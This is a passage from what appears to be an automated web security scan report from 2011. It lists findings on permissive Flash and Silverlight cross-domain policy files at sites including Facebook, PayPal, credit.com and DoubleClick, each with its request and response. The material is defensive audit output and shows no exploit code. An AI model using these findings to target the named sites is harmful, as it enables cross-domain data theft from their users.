Host: www.bluewin.ch

Response

HTTP/1.1 200 OK
Server: Zeus
Date: Sun, 24 Apr 2011 18:51:03 GMT
Connection: close
Content-Type: text/xml
Content-Length: 675
Accept-Ranges: bytes
Last-Modified: Wed, 03 Feb 2010 10:27:07 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="bluewin.ch" />
   <allow-access-from domain="*.bluewin.ch" />
   <allow-access-from domain="swisscom.ch" />
   <allow-access-from domain="*.swisscom.ch" />
   <allow-access-from domain="*.localhost" />
   <allow-access-from domain="*.abonetwork.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.europamp3.org" secure="true" />
...[SNIP]...
<allow-access-from domain="*.wikisik.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cooliris.com" />
...[SNIP]...

7.93. http://www.connect.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.connect.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.27.67.106
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.94. http://www.credit.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.credit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.credit.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:09:34 GMT
Server: Apache/2
Cache-Control: private
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
ETag: "4vgU05lHJnF"
Last-Modified: Thu, 21 Apr 2011 00:24:12 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Sun, 24 Apr 2011 20:09:38 GMT
Content-Length: 307
Set-Cookie: crc=; path=/; expires=Mon, 25-Apr-2011 20:09:33 GMT
Set-Cookie: cuc=1303675774359*http://www.credit.com/r/home; path=/; expires=Mon, 25-Apr-2011 20:09:33 GMT
Set-Cookie: JSESSIONID=edf2ZAVXi1kr_4lpAij_s; domain=credit.com; path=/
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.credit.com" />
<allow-access-from domain="credit.com" />
<allow-access-from domain="s.credit.com" />
...[SNIP]...

7.95. https://www.credit.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.credit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.credit.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:13:11 GMT
Server: Apache/2
Cache-Control: private
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
ETag: "4vgU05lHJnF"
Last-Modified: Thu, 21 Apr 2011 00:24:12 GMT
Accept-Ranges: bytes
Cache-Control: max-age=5
Expires: Sun, 24 Apr 2011 20:13:16 GMT
Content-Length: 307
Set-Cookie: st=-5534049845142782888; path=/; secure
Set-Cookie: crc=; path=/; expires=Mon, 25-Apr-2011 20:13:11 GMT
Set-Cookie: cuc=1303675991973*http://www.credit.com/r/home; path=/; expires=Mon, 25-Apr-2011 20:13:11 GMT
Set-Cookie: JSESSIONID=ebcMgQPwS8Vznazypjj_s; domain=credit.com; path=/
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.credit.com" />
<allow-access-from domain="credit.com" />
<allow-access-from domain="s.credit.com" />
...[SNIP]...

7.96. http://www.emjcd.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.emjcd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.emjcd.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 03:25:39 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

7.97. https://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.37.37
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

7.98. http://www.ftjcfx.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftjcfx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftjcfx.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 25 Apr 2011 00:46:50 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

7.99. http://www.kqzyfj.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kqzyfj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kqzyfj.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 03:25:32 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

7.100. http://www.lduhtrp.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lduhtrp.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lduhtrp.net

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 25 Apr 2011 00:46:26 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

7.101. https://www.paypal.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paypal.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:49 GMT
Server: Apache
Set-Cookie: Apache=10.190.8.156.1303663969708181; path=/; expires=Tue, 16-Apr-41 16:52:49 GMT
Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT
Accept-Ranges: bytes
Content-Length: 312
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.ebay.com" />
<allow-access-from domain="*.paypalobjects.com" />
...[SNIP]...

7.102. http://www.securepaynet.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.securepaynet.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.securepaynet.net

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 12:43:21 GMT
Connection: close
Content-Length: 155

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.securepaynet.net" /></cross-domain-policy>

7.103. https://www.securepaynet.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.securepaynet.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.securepaynet.net

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:50:46 GMT
Connection: close
Content-Length: 155

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.securepaynet.net" /></cross-domain-policy>

7.104. http://www.tqlkg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tqlkg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tqlkg.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Sun, 24 Apr 2011 04:09:52 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

7.105. http://citi.bridgetrack.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 508
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Sun, 24 Apr 2011 19:57:18 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="citi.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="172.16.181.69" />
   <allow-access-from domain="172.16.180.191" />
   <allow-access-from domain="banking.citibank.com" />
   <allow-access-from domain="sec-citi.bridgetrack.com" />
   <allow-access-from domain="citi-preview.bridgetrack.com" />
   <allow-access-from domain="www.sapientprojects.com" />
...[SNIP]...

7.106. http://fightidentitytheft.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fightidentitytheft.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: fightidentitytheft.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT
Accept-Ranges: bytes
ETag: "0e4f34a711c81:ca86"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:46:59 GMT
Connection: close
Set-Cookie: HUBSPOT133=454104236.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

7.107. http://media.compete.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.compete.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.compete.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 29 Mar 2011 18:08:23 GMT
ETag: "b8c48-20c-f226f3c0"
Accept-Ranges: bytes
Content-Length: 524
Content-Type: application/xml; charset=utf-8
Date: Sun, 24 Apr 2011 12:45:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="compete.com" />
<allow-access-from domain="stg.compete.com" />
<allow-access-from domain="www.compete.com" />
<allow-access-from domain="stg.www.compete.com" />
...[SNIP]...
<allow-access-from domain="stg.media.compete.com" />
...[SNIP]...

7.108. http://swisscom-streaming-img.1st.ch/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscom-streaming-img.1st.ch
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: swisscom-streaming-img.1st.ch

Response

HTTP/1.1 200 OK
Server: nginx/0.5.35
Date: Sun, 24 Apr 2011 18:53:38 GMT
Content-Type: text/xml
Content-Length: 452
Last-Modified: Thu, 21 Oct 2010 15:27:50 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="swisscom-streaming.1st.ch" />
<allow-access-from domain="layout.emoticom.ch" />
<allow-access-from domain="intranet.emoticom.ch" />
<allow-access-from domain="bluewin.ch" />
<allow-access-from domain="swisscom.ch" />
<allow-access-from domain="swisscom.com" />
...[SNIP]...

8. Silverlight cross-domain policy  previous  next
There are 26 instances of this issue:


8.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Sun, 24 Apr 2011 15:20:08 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.2. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 24 Apr 2011 04:08:23 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.3. http://ads.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1379"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 24 Apr 2011 16:46:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

8.4. http://analytic.hotelclub.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytic.hotelclub.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: analytic.hotelclub.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:09:52 GMT
Server: Omniture DC/2.0.0
xserver: www121
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8.5. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:29:52 GMT
Date: Sun, 24 Apr 2011 12:29:52 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.6. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 12:09:49 GMT
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

8.7. http://clk.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT
Accept-Ranges: bytes
ETag: "9e243e8fb90c81:0"
Date: Sun, 24 Apr 2011 12:33:04 GMT
Connection: close
Content-Length: 312

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

8.8. http://ec.atdmt.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
